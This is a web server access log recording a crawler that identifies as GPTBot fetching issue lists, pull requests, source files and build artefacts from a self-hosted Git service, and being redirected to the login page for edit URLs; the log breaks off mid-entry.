AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11280] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:19:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11293] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat?display=source" [Client 74.7.227.38] [Length 13617] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:19:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat?display=rendered" [Client 74.7.227.38] [Length 11260] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:19:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py?display=rendered" [Client 74.7.227.38] [Length 11262] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:19:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec?display=rendered" [Client 74.7.227.38] [Length 11253] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:19:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:19:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=all&type=all" -[17/Feb/2026:19:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:19:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11535] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:19:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21574] [Gzip 6.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:19:03:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:19:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:19:03:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:19:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:19:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33692] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33387] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33681] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:03:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:19:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:19:03:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 